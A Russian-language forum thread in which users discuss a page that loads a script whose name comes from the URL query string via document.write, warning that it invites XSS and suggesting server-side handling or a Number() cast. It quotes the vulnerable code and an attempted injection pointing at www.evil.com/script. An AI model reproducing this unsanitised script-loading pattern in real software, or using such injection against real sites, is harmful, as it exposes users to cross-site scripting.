Цитата:
|
способ вставить свою ссылку всё равно есть, ты уже открыл окно для xss, так что это только вопрос времени (которого у меня сейчас нет, так как я на работе).
|
Это на стороне сервера делаться должно. Но имя скрипта в урле передавать все равно не надо.
|
Цитата:
Подгружается скрипт с этим - Add("1","10001","17","1.000","15.000","1") |
можно подгружать свой скрипт, а из него подргужать твой и никто ругаться не будет...
|
Думаю ничего не получиться...
document.write('<script TYPE="text/javascript" src="www.name.ru/'+url+'.js"> www.name.ru/index.htm?http://www.evil.com/script и что моя страница откроет? www.name.ru/http://www.evil.com/script.js думаю ругаться будет. я уже попоробывал открыть другой скрипт, в котором прописал просто открыть нужный мне. и ничего не получилось встроеный в страницу скрипт сразу ругнулся... |
не бойся, если у тебя не получилось, это не значит что так нельзя...
|
Цитата:
|
viliv, тебе все правильно советуют. Это лучше делать на сервере, с помощью php или что у тебя там. Если данных в целом немного, можно их все подгрузить. Если же ты все-таки хочешь обойтись без серверного языка, то напиши лучше
document.write('<script TYPE="text/javascript" src="'+Number(url)+'.js"><\/script>') т.е. будет происходить преобразование в число. Ослаблять это ограничение (только числа) опасно Хотя мне тоже интересно как можно воспользоваться src="www.name.ru/'+url+'.js" Скорее всего имелось в виду, что плохо заводить такую привычку. Однажды она тебя подведет ;-) |
Цитата:
если на name.ru будет неаккуратный редирект серверный где-нить, то хана. но и помимо этого простор для творчества есть.это ж ведь немного искуство))) |
Часовой пояс GMT +3, время: 15:00. |